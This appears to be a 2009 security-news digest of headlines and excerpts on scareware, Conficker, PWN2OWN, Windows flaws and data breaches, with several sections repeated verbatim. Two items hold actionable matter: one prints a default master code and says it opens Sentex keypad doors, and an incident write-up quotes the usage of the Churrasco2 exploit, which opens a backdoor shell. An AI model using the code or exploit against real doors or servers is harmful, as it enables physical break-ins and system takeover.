The written apology by Harvard Law School professor Charles Nesson came on Tuesday, a week after U.S. District Judge Nancy Gertner sharply rebuked Nesson over a motion he had filed seeking to depose a person who he claimed was a representative of the record companies that filed the lawsuit.
...
----------
Vulnerability Found In Intel CPU Caching
Mar 20, 2009
Flaw could allow attackers to remotely control Intel-based devices or extract data from memory
Stealthier then a MBR rootkit, more powerful then ring 0 control, it’s the soon to be developed SMM root kit.
----------
Apple Imposes NDA for App Store Rejections
----------
TomTom fights Microsoft FAT32 lawsuit with suit of its own
about 4 hours ago - by Jacqui Cheng Posted in: Law & Disorder
TomTom has filed a countersuit against Microsoft, accusing the software giant of infringing on three of its in-car navigational patents. The suit is just the latest in the back-and-forth between the two companies, though some believe they'll eventually just settle.
Read more
----------
Rogue Antivirus Distribution Network Dismantled
Posted at 01:08 PM ET, 03/20/2009
A major distribution network for rogue anti-virus products has been shut down following reports by Security Fix about massive profits that the network's affiliates were making for disseminating the worthless software.
On Monday, Security Fix profiled TrafficConverter2.biz, a program that pays affiliates handsome commissions for spreading "scareware" products like Antivirus2009 and Antivirus360. Scareware tries to frighten consumers into purchasing fake security software by pestering them with misleading and incessant warnings about threats resident on their systems.
According to a message posted at TrafficConverter2.biz and its sister sites, the programs credit card payment processor pulled the plug on them shortly after our story ran. TrafficConverter2.biz is currently unreachable...
Permalink
----------
Antivirus2009 Holds Victim's Documents for Ransom
Posted at 06:35 AM ET, 03/20/2009
Security experts are warning that some new "scareware" programs, software that tries to frighten consumers into purchasing bogus security products, also encrypt the victim's digital documents until he or she agrees to pay a $50 ransom demand.
Newer versions of scareware family Antivirus2009 warn users in a fake Windows alert that files in the "My Documents" folder are corrupt. The program them directs the victim to download a program called "FileFixerPro" to fix the supposedly corrupt files.
In fact, this version of Antivirus2009 encrypts or scrambles contents of documents in that folder, so that only users who pay $50 for a FileFixerPro license can get the decryption key needed to regain access to the files in their My Documents folder.
Permalink
----------
New firewall for the Linux kernel
----------
Larry Dignan: The browser battle: What about security?
Special report: New battles loom with the introduction of Internet Explorer 8, Chrome beta, and Opera Turbo this week. As the browser makers wrangle over speed, rendering abilities, and new tools, experts are asking, what about security?
----------
Death of actress Natasha Richardson exploited by scareware
Greg Masters March 20, 2009
A day after news broke of the death of British actress Natasha Richardson, malicious websites sprung up to lure victims looking for information on the tragedy.
----------
Online Organ Transplant Scam Results in Death, Arrest
The authorities have arrested a U.S. fugitive in Guam accused of running a bogus online organ transplant service that duped the sick out of as much as $400,000 – a scam prosecutors said Thursday led to the death of Canadian man awaiting a liver.
----------
Bugs found and announced to manufacturers but NOT patched yet:
http://dvlabs.tippingpoint.com/advisories/upcoming/
There are currently 82 advisories pending public disclosure.
----------
A search is launched for Conficker's first victim
March 20, 2009 (IDG News Service) Where did the Conficker worm come from? Researchers at the University of Michigan are trying to find out, using a vast network of Internet sensors to track down the so-called "patient zero" of an outbreak that has infected more than 10 million computers to date.
The university uses so-called Darknet sensors that were set up about six years ago to keep track of malicious activity. With funding from the U.S. Department of Homeland Security, computer scientists have banded together to share data collected from sensors around the world.
"The goal is to get close enough so you can actually start mapping out how the spread started," said Jon Oberheide, a University of Michigan graduate student who is working on the project.
...
----------
Post-breach criticism of PCI security standard misplaced, Visa exec says
Visa pilots new payment card security initiatives
Acknowledging the need for controls that go beyond those offered by the Payment Card Industry (PCI) Data Security Standard, a senior Visa Inc. executive today described two new initiatives to reduce payment card fraud being tested by the company.
One of the pilots involves Fifth Third Bank, which is testing the use of magnetic stripe technology to create unique digital fingerprints for cards, said Ellen Richey, Visa's chief enterprise risk officer. Each stripe contains unique characteristics that can be captured and used to verify the digital identity of the card, Richey said at a security event being hosted by Visa today. The goal is to stop the creation and use of counterfeit cards based on stolen payment card data.
----------
Expert: Hackers penetrating industrial control systems
----------
Researcher hacks just-launched IE8
...
Just hours before Microsoft Corp. officially launched the final code for Internet Explorer 8, a German researcher yesterday hacked the browser during the PWN2OWN contest to win $5,000 and a Sony Viao laptop.
The researcher, a computer science student from Germany who would only give his first name, Nils, broke into the Sony within minutes by exploiting a previously unknown vulnerability in the new browser, said Terri Forslof, manager of security response at 3Com Corp.'s TippingPoint, the contest sponsor. The laptop was running what Forslof described as a "recent Microsoft internal build" of Windows 7.
...
----------
Researcher cracks Mac in 10 seconds at PWN2OWN, wins $5k
...
"I can't talk about the details of the vulnerability, but it was a Mac, fully patched, with Safari, fully patched," said Miller on Wednesday, not long after he had won the prize. "It probably took five or 10 seconds." He confirmed that he had researched and written the exploit before he arrived at the challenge.
...
----------
Harvard professor apologizes to judge for faulty motion in RIAA music piracy case
In yet another twist to a music piracy case that already has attracted lots of attention, a Harvard University law professor who is defending a Boston University graduate student accused of copyright infringement by the Recording Industry Association of America (RIAA) apologized this week to a federal judge in Boston for wasting the court's time with one of his motions.
The written apology by Harvard Law School professor Charles Nesson came on Tuesday, a week after U.S. District Judge Nancy Gertner sharply rebuked Nesson over a motion he had filed seeking to depose a person who he claimed was a representative of the record companies that filed the lawsuit.
...
----------
Vulnerability Found In Intel CPU Caching
Mar 20, 2009
Flaw could allow attackers to remotely control Intel-based devices or extract data from memory
Stealthier then a MBR rootkit, more powerful then ring 0 control, it’s the soon to be developed SMM root kit.
----------
Apple Imposes NDA for App Store Rejections
----------
TomTom fights Microsoft FAT32 lawsuit with suit of its own
about 4 hours ago - by Jacqui Cheng Posted in: Law & Disorder
TomTom has filed a countersuit against Microsoft, accusing the software giant of infringing on three of its in-car navigational patents. The suit is just the latest in the back-and-forth between the two companies, though some believe they'll eventually just settle.
Read more
----------
Rogue Antivirus Distribution Network Dismantled
Posted at 01:08 PM ET, 03/20/2009
A major distribution network for rogue anti-virus products has been shut down following reports by Security Fix about massive profits that the network's affiliates were making for disseminating the worthless software.
On Monday, Security Fix profiled TrafficConverter2.biz, a program that pays affiliates handsome commissions for spreading "scareware" products like Antivirus2009 and Antivirus360. Scareware tries to frighten consumers into purchasing fake security software by pestering them with misleading and incessant warnings about threats resident on their systems.
According to a message posted at TrafficConverter2.biz and its sister sites, the programs credit card payment processor pulled the plug on them shortly after our story ran. TrafficConverter2.biz is currently unreachable...
Permalink
----------
Antivirus2009 Holds Victim's Documents for Ransom
Posted at 06:35 AM ET, 03/20/2009
Security experts are warning that some new "scareware" programs, software that tries to frighten consumers into purchasing bogus security products, also encrypt the victim's digital documents until he or she agrees to pay a $50 ransom demand.
Newer versions of scareware family Antivirus2009 warn users in a fake Windows alert that files in the "My Documents" folder are corrupt. The program them directs the victim to download a program called "FileFixerPro" to fix the supposedly corrupt files.
In fact, this version of Antivirus2009 encrypts or scrambles contents of documents in that folder, so that only users who pay $50 for a FileFixerPro license can get the decryption key needed to regain access to the files in their My Documents folder.
Permalink
----------
New firewall for the Linux kernel
----------
Larry Dignan: The browser battle: What about security?
Special report: New battles loom with the introduction of Internet Explorer 8, Chrome beta, and Opera Turbo this week. As the browser makers wrangle over speed, rendering abilities, and new tools, experts are asking, what about security?
----------
Death of actress Natasha Richardson exploited by scareware
Greg Masters March 20, 2009
A day after news broke of the death of British actress Natasha Richardson, malicious websites sprung up to lure victims looking for information on the tragedy.
----------
Online Organ Transplant Scam Results in Death, Arrest
The authorities have arrested a U.S. fugitive in Guam accused of running a bogus online organ transplant service that duped the sick out of as much as $400,000 – a scam prosecutors said Thursday led to the death of Canadian man awaiting a liver.
----------
Bugs found and announced to manufacturers but NOT patched yet:
http://dvlabs.tippingpoint.com/advisories/upcoming/
There are currently 82 advisories pending public disclosure.
Wednesday, March 18, 2009
Wednesday 03/18/09
A Real Dumpster Dive: Bank Tosses Personal Data, Checks Data protection is not just an IT security issue. But security industry analyst Steve Hunt, who heads up Hunt Business Intelligence, believes too many people in IT security still have that false perception. Read more...
----------
IT contractor indicted for sabotaging offshore rig management system
March 18, 2009 (Computerworld) An IT contract employee who formerly worked at an oil and gas production company in Long Beach, Calif., was indicted yesterday on charges of sabotaging a computer system he helped set up because the company did not offer him a permanent job.
The case is the latest to highlight the challenge that businesses face in trying to protect corporate systems and networks from rogue insiders and those with privileged access to systems, such as contractors and business partners. Security analysts have warned about the heightened threats such users pose to corporations because of the broader disgruntlement resulting from layoffs and other belt-tightening steps companies have taken during the recession.
----------
Vivek Kundra reinstated as federal CIO
March 17, 2009 (Computerworld) Vivek Kundra, who took a leave of absence from his job as the federal government's first CIO last week, was reinstated today after the White House determined that he has no connection to an alleged bribery scheme in the District of Columbia's IT department, where he previously was chief technology officer.
"Mr. Kundra has been informed that he is neither a subject nor a target of the investigation and has been reinstated," White House spokesman Nick Shapiro said via e-mail late today, in response to a query seeking confirmation of reports posted online by the Personal Democracy Forum's techPresident blog and The New York Times.
Kundra had been on leave since last Thursday, following the arrests of the D.C. IT department's acting chief security officer and the CEO of an outsourcing contractor on bribery and other charges. The arrests and a related raid on the district's IT offices took place as Kundra was speaking at FOSE 2009, a government IT conference in Washington, in his first major public appearance since being named federal CIO.
...
----------
Blogger who streamed pre-release Guns N' Roses songs deserves prison time, say feds
----------
D.C. IT bribery suspect to remain in jail; judge says evidence 'overwhelming'
----------
Criminals sneak card-sniffing software on Diebold ATMs
March 17, 2009 (IDG News Service) Diebold Inc. has released a security fix for its Opteva automated teller machines after cybercriminals apparently broke into the systems at one or more businesses in Russia and installed malicious software.
Diebold learned of the incident in January and sent out a global security update to its ATM customers using the Windows operating system. It is not releasing full details of what happened, including which businesses were affected, but said criminals had gained physical access to the machines to install their malicious program.
"Criminals gained physical access to the inside of the affected ATMs," Diebold said in its security update. "This criminal activity resulted in the operation of unauthorized software and devices on the ATMs, which was used to intercept sensitive information."
----------
Consumer Groups Launch Badware-busting Community PC World - Tue Mar 17, 12:50 PM ET
The people behind StopBadware.org have launched a Web site where ordinary people can band together to fight computer viruses and adware.
----------
Social Networks' Risks for Business Security
Corporate social media has many positives, but security issues should not be overlooked.
----------
Adobe Security Bulletin Adobe Reader and Acrobat
Adobe has released security advisory APSB09-04 for Adobe Reader and Acrobat. The CVE entries related to the vulnerabilities being patched are CVE-2009-0658 and CVE-2009-0927. Current versions are now 9.1, 8.1.4, and 7.11. Updates for both Windows and Macintosh platforms are available.
----------
NSA Director: We Don't Want to Run Cybersecurity
CSO Publisher Bob Bragdon moderates the IT Security Entrepreneur's Forum at Stanford University and blogs about the keynote speech from NSA Director and Lt. Gen. Keith Alexander.
Read more
----------
GS cookie protection – effectiveness and limitations
Monday, March 16, 2009 4:15 PM
MSRC Engineering
The Microsoft C/C++ compiler supports the GS switch which aims to detect stack buffer overruns at runtime and terminate the process, thus in most cases preventing an attacker from gaining control of the vulnerable machine. This post will not go into detail about how GS works, so it may be helpful to refer to these MSDN articles for an overview and loads of detail on how GS works and what a GS cookie is. It’s important to note that depending on the exact vulnerability, even if a function is protected by a GS cookie, a stack-based buffer overrun may still be exploitable – for example if the attacker can gain control prior to the cookie check. However even in these circumstances, GS can often be a significant obstacle to exploitation and/or reliability of exploitation. There have been some stack-based attacks recently that were not mitigated by GS – this post takes a couple of examples and looks at why that was.
...
----------
Posted at 10:00 AM ET, 03/17/2009
Newsflash: Local Man Launches Virus Epidemic
Malware authors are beginning to personalize virus attacks sent through e-mail, blasting out fake news alerts about shocking events that supposedly happened in or around the recipient's home town.
This latest innovation comes compliments of the Waledac worm, widely seen as the successor to the Storm worm, a wily virus that used a seemingly bottomless bag of new tricks to fool people into clicking on links that launch the worm into action.
On Monday, security firm Trend Micro began warning people to look out for bogus "Reuters breaking news" e-mails warning of explosion or other various calamities that have supposedly broken out in a city near you. The message content pulls data from so-called "geo-location" services that can use the recipient's Internet address to make a semi-accurate guess of their nearest town.
For example, a user who lives in Fairfax, Va., might see this subject line in a missive sent by Waledac: "Powerful explosion burst in Fairfax this morning." The message authors also append a Wikipedia link and a Google search link at the bottom to add to the fake alert's legitimacy.
Trend and other security firms first spotted this localization technique used by another Waledac variant last month, which used e-mails claiming to help recipients weather the financial crisis by linking to fake coupons for retail stores in the recipient's area.
Posted by Brian Krebs Permalink
----------
17 March 2009
More information on Microsoft's DNS and WINS patches
Last weeks patch for Microsoft's DNS and WINS servers immunises clean systems, but does not clean up already affected systems more…
Microsoft has responded to criticism that the fixes for DNS and WINS released last Patch Tuesday as MS09-008, were ineffective. One security researcher complained that already inserted WPAD (Web Proxy Auto Discovery) entries were not removed or blocked. In a blog entry, MSRC Program Manager Maarten Van Horenbeck, said that this was intentional, as Microsoft only creates security updates to protect a system against future attacks and does not aim to undo any attack "that has taken place in the past".
He then goes on to show how WPAD entries can be verified using the MMC DNS snap-in. Microsoft's expert also expands on the background to the other vulnerabilities that the patch fixes.
----------
Cisco's data center plans: Winners, losers
Larry Dignan: Cisco rolled out its long-awaited vision of data center architecture, including multiple partners, a wire-once approach to link computing, virtualization, storage and networking and a call to lower costs.
Cisco: 'We're going to compete with HP'
What Cisco learned from open source
Gallery: Cisco's blade servers
----------
Year-old Windows hole under attack
Ryan Naraine: Exactly one year after a security researcher notified Microsoft of a serious security vulnerability affecting all supporting version of Windows, the issue remains unpatched and now it's allegedly in the wild.
Exactly one year after a security researcher notified Microsoft of a serious security vulnerability affecting all supporting version of Windows (including Vista and Windows Server 2008), the issue remains unpatched and now comes word that there are in-the-wild exploits circulating.
The vulnerability, called token kidnapping (.pdf), was originally discussed last March by researcher Cesar Cerrudo and led to Microsoft issuing an advisory with workarounds. Five months later (October 2008), Cerrudo released a proof-of-concept in an apparent effort to nudge Microsoft into patching but the company has not yet released a fix.
...
----------
That article included these lines:
It should also be said that the list of outstanding Windows flaws collecting dust is very long and continues to grow everyday.
In the absence of a patch, end users should pay attention to the workarounds/mitigations in Microsoft’s advisory.
----------
Some items from that article:
The missing WMP patch is just one of a several known — and very serious — vulnerabilities that have not yet been patched by Microsoft. A few off the top of my head:
Internet Explorer – Remember the Safari-to-IE blended threat from April? This vulnerability was reported to Microsoft since 2006 and, despite issuing an advisory that embarrassed Apple into shipping a Safari fix, Microsoft has still not fixed the underlying code defect. Now, I’m hearing murmurings that this issue probably won’t be fixed until Windows 7. Boo!
Token Kidnapping — Four months after shipping a pre-patch advisory confirming the severity of Cesar Cerrudo’s token kidnapping (.pdf) bug, Microsoft’s fix is still not available. This issue affects Windows XP Professional Service Pack 2 and all supported versions and editions of Windows Server 2003, Windows Vista, and Windows Server 2008.
Ghosts in Browsers — It’s been more than three months since Manuel Cabellero (now a Microsoft employee) went to Blue Hat and gave the scary ghosts-in-the-browser talk. Nate McFeters saw the carnage first hand and confirms that it affects “all browsers.” Since then, Sirdarckcat published details on IE browser flaws that entends to both IE 7 and IE 8 beta. Worse, they’re all still unpatched.
Web Proxy Auto-Discovery — This man-in-the-middle WPAD issue, publicly discussed at Kiwicon last December, is another bug on Microsoft’s late list. An advisory with mitigations (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista) is available but still no patch. This issue also relates to all versions of Internet Explorer, including IE 7 for Windows Vista so it’s not insignificant.
Print Table of Links (IE) - Aviv Raff’s discovery of a cross-zone issue affecting IE 7 and IE 8 beta is publicly known but, despite the availability of proof-of-concept code, there’s no fix yet from Microsoft.
If that list is not scary enough, take a peek at this upcoming advisories page maintained by TippingPoint’s Zero Day Initiative. It lists a whopping 20 unpatched vulnerabilities that have been reported to Microsoft, some more than 200 days ago.
----------
Patch Those Internet Printers
When I wrote a scanner plug-in this week for an old directory traversal vulnerability–CVE-2008-4419–I wondered whether there are vulnerable HP LaserJet printers online that can be controlled from the Internet. To find out, I used Google. The search listed almost 50 results, and I found that almost all of these printers are not patched, even though HP has provided firmware updates to resolve this vulnerability. An attacker could leverage this unicode-encoded directory traversal vulnerability to read configuration files or cached documents, and gain read access from the Internet to important internal information.
Usually administrators ignore the security of printer devices. They may think there is no harm even if the printer can be controlled remotely by an attacker.
The administration web interface of these LaserJets can be accessed without passwords. The attacker can use these LaserJets to print any documents from anywhere. Although attackers may not be able to reach the printouts, at least they can waste a lot of paper. Spammers can also post free advertising to companies if they connect to these printers.
So please harden your network gateway or firewall to restrict access to these devices. Don’t give everyone on the Internet a chance to use your printer, and patch the vulnerable LaserJets to prevent the potential information disclosure.
To download the HP firmware updates and upgrade instructions, click here.
----------
... The downsizing has been added to the Layoff Tracker, which has tracked over 300,000 layoffs since last year.
Total Layoffs Since August 27, 2008: 441
Total Employees: 310,718
----------
----------
IT contractor indicted for sabotaging offshore rig management system
March 18, 2009 (Computerworld) An IT contract employee who formerly worked at an oil and gas production company in Long Beach, Calif., was indicted yesterday on charges of sabotaging a computer system he helped set up because the company did not offer him a permanent job.
The case is the latest to highlight the challenge that businesses face in trying to protect corporate systems and networks from rogue insiders and those with privileged access to systems, such as contractors and business partners. Security analysts have warned about the heightened threats such users pose to corporations because of the broader disgruntlement resulting from layoffs and other belt-tightening steps companies have taken during the recession.
----------
Vivek Kundra reinstated as federal CIO
March 17, 2009 (Computerworld) Vivek Kundra, who took a leave of absence from his job as the federal government's first CIO last week, was reinstated today after the White House determined that he has no connection to an alleged bribery scheme in the District of Columbia's IT department, where he previously was chief technology officer.
"Mr. Kundra has been informed that he is neither a subject nor a target of the investigation and has been reinstated," White House spokesman Nick Shapiro said via e-mail late today, in response to a query seeking confirmation of reports posted online by the Personal Democracy Forum's techPresident blog and The New York Times.
Kundra had been on leave since last Thursday, following the arrests of the D.C. IT department's acting chief security officer and the CEO of an outsourcing contractor on bribery and other charges. The arrests and a related raid on the district's IT offices took place as Kundra was speaking at FOSE 2009, a government IT conference in Washington, in his first major public appearance since being named federal CIO.
...
----------
Blogger who streamed pre-release Guns N' Roses songs deserves prison time, say feds
----------
D.C. IT bribery suspect to remain in jail; judge says evidence 'overwhelming'
----------
Criminals sneak card-sniffing software on Diebold ATMs
March 17, 2009 (IDG News Service) Diebold Inc. has released a security fix for its Opteva automated teller machines after cybercriminals apparently broke into the systems at one or more businesses in Russia and installed malicious software.
Diebold learned of the incident in January and sent out a global security update to its ATM customers using the Windows operating system. It is not releasing full details of what happened, including which businesses were affected, but said criminals had gained physical access to the machines to install their malicious program.
"Criminals gained physical access to the inside of the affected ATMs," Diebold said in its security update. "This criminal activity resulted in the operation of unauthorized software and devices on the ATMs, which was used to intercept sensitive information."
----------
Consumer Groups Launch Badware-busting Community PC World - Tue Mar 17, 12:50 PM ET
The people behind StopBadware.org have launched a Web site where ordinary people can band together to fight computer viruses and adware.
----------
Social Networks' Risks for Business Security
Corporate social media has many positives, but security issues should not be overlooked.
----------
Adobe Security Bulletin Adobe Reader and Acrobat
Adobe has released security advisory APSB09-04 for Adobe Reader and Acrobat. The CVE entries related to the vulnerabilities being patched are CVE-2009-0658 and CVE-2009-0927. Current versions are now 9.1, 8.1.4, and 7.11. Updates for both Windows and Macintosh platforms are available.
----------
NSA Director: We Don't Want to Run Cybersecurity
CSO Publisher Bob Bragdon moderates the IT Security Entrepreneur's Forum at Stanford University and blogs about the keynote speech from NSA Director and Lt. Gen. Keith Alexander.
Read more
----------
GS cookie protection – effectiveness and limitations
Monday, March 16, 2009 4:15 PM
MSRC Engineering
The Microsoft C/C++ compiler supports the GS switch which aims to detect stack buffer overruns at runtime and terminate the process, thus in most cases preventing an attacker from gaining control of the vulnerable machine. This post will not go into detail about how GS works, so it may be helpful to refer to these MSDN articles for an overview and loads of detail on how GS works and what a GS cookie is. It’s important to note that depending on the exact vulnerability, even if a function is protected by a GS cookie, a stack-based buffer overrun may still be exploitable – for example if the attacker can gain control prior to the cookie check. However even in these circumstances, GS can often be a significant obstacle to exploitation and/or reliability of exploitation. There have been some stack-based attacks recently that were not mitigated by GS – this post takes a couple of examples and looks at why that was.
...
----------
Posted at 10:00 AM ET, 03/17/2009
Newsflash: Local Man Launches Virus Epidemic
Malware authors are beginning to personalize virus attacks sent through e-mail, blasting out fake news alerts about shocking events that supposedly happened in or around the recipient's home town.
This latest innovation comes compliments of the Waledac worm, widely seen as the successor to the Storm worm, a wily virus that used a seemingly bottomless bag of new tricks to fool people into clicking on links that launch the worm into action.
On Monday, security firm Trend Micro began warning people to look out for bogus "Reuters breaking news" e-mails warning of explosion or other various calamities that have supposedly broken out in a city near you. The message content pulls data from so-called "geo-location" services that can use the recipient's Internet address to make a semi-accurate guess of their nearest town.
For example, a user who lives in Fairfax, Va., might see this subject line in a missive sent by Waledac: "Powerful explosion burst in Fairfax this morning." The message authors also append a Wikipedia link and a Google search link at the bottom to add to the fake alert's legitimacy.
Trend and other security firms first spotted this localization technique used by another Waledac variant last month, which used e-mails claiming to help recipients weather the financial crisis by linking to fake coupons for retail stores in the recipient's area.
Posted by Brian Krebs Permalink
----------
17 March 2009
More information on Microsoft's DNS and WINS patches
Last weeks patch for Microsoft's DNS and WINS servers immunises clean systems, but does not clean up already affected systems more…
Microsoft has responded to criticism that the fixes for DNS and WINS released last Patch Tuesday as MS09-008, were ineffective. One security researcher complained that already inserted WPAD (Web Proxy Auto Discovery) entries were not removed or blocked. In a blog entry, MSRC Program Manager Maarten Van Horenbeck, said that this was intentional, as Microsoft only creates security updates to protect a system against future attacks and does not aim to undo any attack "that has taken place in the past".
He then goes on to show how WPAD entries can be verified using the MMC DNS snap-in. Microsoft's expert also expands on the background to the other vulnerabilities that the patch fixes.
----------
Cisco's data center plans: Winners, losers
Larry Dignan: Cisco rolled out its long-awaited vision of data center architecture, including multiple partners, a wire-once approach to link computing, virtualization, storage and networking and a call to lower costs.
Cisco: 'We're going to compete with HP'
What Cisco learned from open source
Gallery: Cisco's blade servers
----------
Year-old Windows hole under attack
Ryan Naraine: Exactly one year after a security researcher notified Microsoft of a serious security vulnerability affecting all supporting version of Windows, the issue remains unpatched and now it's allegedly in the wild.
Exactly one year after a security researcher notified Microsoft of a serious security vulnerability affecting all supporting version of Windows (including Vista and Windows Server 2008), the issue remains unpatched and now comes word that there are in-the-wild exploits circulating.
The vulnerability, called token kidnapping (.pdf), was originally discussed last March by researcher Cesar Cerrudo and led to Microsoft issuing an advisory with workarounds. Five months later (October 2008), Cerrudo released a proof-of-concept in an apparent effort to nudge Microsoft into patching but the company has not yet released a fix.
...
----------
That article included these lines:
It should also be said that the list of outstanding Windows flaws collecting dust is very long and continues to grow everyday.
In the absence of a patch, end users should pay attention to the workarounds/mitigations in Microsoft’s advisory.
----------
Some items from that article:
The missing WMP patch is just one of a several known — and very serious — vulnerabilities that have not yet been patched by Microsoft. A few off the top of my head:
Internet Explorer – Remember the Safari-to-IE blended threat from April? This vulnerability was reported to Microsoft since 2006 and, despite issuing an advisory that embarrassed Apple into shipping a Safari fix, Microsoft has still not fixed the underlying code defect. Now, I’m hearing murmurings that this issue probably won’t be fixed until Windows 7. Boo!
Token Kidnapping — Four months after shipping a pre-patch advisory confirming the severity of Cesar Cerrudo’s token kidnapping (.pdf) bug, Microsoft’s fix is still not available. This issue affects Windows XP Professional Service Pack 2 and all supported versions and editions of Windows Server 2003, Windows Vista, and Windows Server 2008.
Ghosts in Browsers — It’s been more than three months since Manuel Cabellero (now a Microsoft employee) went to Blue Hat and gave the scary ghosts-in-the-browser talk. Nate McFeters saw the carnage first hand and confirms that it affects “all browsers.” Since then, Sirdarckcat published details on IE browser flaws that entends to both IE 7 and IE 8 beta. Worse, they’re all still unpatched.
Web Proxy Auto-Discovery — This man-in-the-middle WPAD issue, publicly discussed at Kiwicon last December, is another bug on Microsoft’s late list. An advisory with mitigations (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista) is available but still no patch. This issue also relates to all versions of Internet Explorer, including IE 7 for Windows Vista so it’s not insignificant.
Print Table of Links (IE) - Aviv Raff’s discovery of a cross-zone issue affecting IE 7 and IE 8 beta is publicly known but, despite the availability of proof-of-concept code, there’s no fix yet from Microsoft.
If that list is not scary enough, take a peek at this upcoming advisories page maintained by TippingPoint’s Zero Day Initiative. It lists a whopping 20 unpatched vulnerabilities that have been reported to Microsoft, some more than 200 days ago.
----------
Patch Those Internet Printers
When I wrote a scanner plug-in this week for an old directory traversal vulnerability–CVE-2008-4419–I wondered whether there are vulnerable HP LaserJet printers online that can be controlled from the Internet. To find out, I used Google. The search listed almost 50 results, and I found that almost all of these printers are not patched, even though HP has provided firmware updates to resolve this vulnerability. An attacker could leverage this unicode-encoded directory traversal vulnerability to read configuration files or cached documents, and gain read access from the Internet to important internal information.
Usually administrators ignore the security of printer devices. They may think there is no harm even if the printer can be controlled remotely by an attacker.
The administration web interface of these LaserJets can be accessed without passwords. The attacker can use these LaserJets to print any documents from anywhere. Although attackers may not be able to reach the printouts, at least they can waste a lot of paper. Spammers can also post free advertising to companies if they connect to these printers.
So please harden your network gateway or firewall to restrict access to these devices. Don’t give everyone on the Internet a chance to use your printer, and patch the vulnerable LaserJets to prevent the potential information disclosure.
To download the HP firmware updates and upgrade instructions, click here.
----------
... The downsizing has been added to the Layoff Tracker, which has tracked over 300,000 layoffs since last year.
Total Layoffs Since August 27, 2008: 441
Total Employees: 310,718
----------
Friday, March 13, 2009
Friday 03/13/09
Conficker/Downadup Evolves To Defend Itself
Mar 12,2009
Worm develops ability to disable antimalware tools, switch domains more frequently
----------
Major Cybercrime Busts Take Place In Romania
----------
Government Needs To Get Its Cybersecurity In Gear, Experts Tell Congress
Mar 10,2009
Security industry leaders agree that White House should lead revamped cybersecurity effort
----------
When web application security, Microsoft and the AV vendors all fail
I just spent some time analyzing yet another incident and I was actually shocked about how the combination of relatively weak defenses led to a system being completely compromised.The three main actors in this movie were a web application with a security vulnerability, Microsoft’s server class operating systems with an unpatched local privilege escalation vulnerability and the last line of everyone’s defense, the AV vendors.
The story started more or less like hundreds of recently seen incidents. A web application had a vulnerability that allowed a remote attacker to upload files to the server. As the files were not validated, the attacker was able to upload a .NET Webshell. This webshell is known as ASPXSpy, it’s an ASPX program that allows easy control over the compromised server. The attacker can now upload files through the browser and execute them.
However, the attacker still does not have total control over the server as the IIS service runs under an unprivileged account. This is where the local privilege escalation vulnerability comes into play. The attackers uploaded a local exploit called Churrasco2. This is a PoC created by a well known researcher Cesar Cerrudo and published back in October 2008. What makes it even worse is that it work on both Windows Server 2008 and Server 2003. The exploit creates a backdoor shell after it steals the SYSTEM token. The program’s usage description says it all:
/Churrasco/-->Usage: Churrasco2.exe ipaddress port
After this, it was game over. The attacker had a backdoor to the server running as SYSTEM. The next steps were very obvious and included installation of another Trojan as well as a keylogger.
Finally, the last line of defense, the anti-virus program, failed as well. Although the AV vendors typically include detection for exploits, it’s clear that they missed this one. I ran it past VirusTotal and the results where … well … horrible is an understatement – 0 AV programs detected this: http://www.virustotal.com/analisis/4f48b73697428888f338bf66fa1eb92a
So, what can we learn from this example? The attacks I described are in the wild and are abused. The first line of defense, in this case the web application’s security, must be made as secure as possible – secure coding standards, penetration tests and whatever else you can do are justified. As we saw from this example, other defenses failed. And the security of your web application depends only on you.
This doesn’t mean that other two actors should just sit and do nothing. Microsoft should really fix this vulnerability and pay more attention to local privilege escalation vulnerabilities. While MS released an advisory with suggested workarounds (available at http://www.microsoft.com/technet/security/advisory/951306.mspx), I don’t think enough people know about this.
Finally, the AV vendors should be more proactive (instead of reactive) and follow exploit research developments so they can add detection for similar exploits early and protect their customers.
----------
Massive ARP spoofing attacks on web sites
----------
Russian youth organization cops to 2007 Estonian cyberattacks
Nearly two years after Estonian government sites were brought to their knees by a DDoS attack, a high-ranking official over the Russian youth group Nashi has admitted that his organization was behind the attacks. Nashi maintains that it acted without authorization from the government, but will the Russians move to punish those responsible in a tense political situation?
----------
The March 2009 release contains 3 new bulletins, 1 of which has a maximum severity of "Critical".
MS09-006 - Vulnerabilities in Windows Kernel Could Allow Remote Code Execution (958690)
MS09-007 - Vulnerability in SChannel Could Allow Spoofing (960225)
MS09-008 - Vulnerabilities in DNS and WINS Server Could Allow Spoofing (962238)
We also revised bulletin MS08-052 Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593), to note a revision to some of the packages associated with this bulletin (specifically 938464).
----------
Hacking iTunes Gift Cards, and an iTunes Update
Recently, several media outlets have been running a fascinating story about hackers making oodles of money selling iTunes gift cards activation codes at online auctions, supposedly after cracking the secret algorithm Apple uses to generate voucher codes for iTunes gift cards.
But a blog post published today by one of the security industry's most prominent researchers suggests that the real hack here is far simpler: The crooks are merely using stolen credit cards to purchase and resell the iTunes gift cards.
Permalink
----------
The Doghouse: Sentex Keypads
It has a master key:
Here's a fun little tip: You can open most Sentex key pad-access doors by typing in the following code:
***00000099#*
The first *** are to enter into the admin mode, 000000 (six zeroes) is the factory-default password, 99# opens the door, and * exits the admin mode (make sure you press this or the access box will be left in admin mode!)
----------
Former FBI Director calls for decentralisation of cybersecurity responsibilities
Former FBI director, Louis Freeh warns that security problems on networks are too complex for the National Security Agency (NSA) alone, to resolve more…
----------
"The French national police force, the Gendarmerie Nationale, has spoken about their migration away from the Windows platform to Linux. Estimated to have already saved the force 50 Million Euros, the migration is due to be completed on all 90,000 workstations by 2015. Of the move, Lt. Col. Guimard had this comment: '"Moving from Microsoft XP to Vista would not have brought us many advantages and Microsoft said it would require training of users. Moving from XP to Ubuntu, however, proved very easy. The two biggest differences are the icons and the games. Games are not our priority."'"
Read More...
----------
BBC buys a botnet, DDoSes security firm
Dancho Danchev: A team at the BBC's Click purchases a botnet of 22,000 malware-infected PCs, self-spams themselves on a Gmail account, then DDoS-es security company Prevx. Is this anyway to fight cybercrime?
----------
Be Careful What You Search For
March 11, 2009
Several Search Engine Optimization schemes are being used to attract search engine users to fake anti-virus web sites.
----------
CLIENT ALERT:
Musicians Lobbying For Approval Of Ticketmaster-Live Nation Merger Forget To Mention Massive Conflict Of Interest
----------
Visa: Heartland, RBS WorldPay no longer PCI compliant
Dan Kaplan March 13, 2009
Visa has removed Heartland Payment Systems and RBS WorldPay -- two payment processors that have announced massive data breaches in recent months -- from its list of service providers compliant with payment industry guidelines.
----------
Web malware, more advanced and targeted than ever
Dan Kaplan March 12, 2009
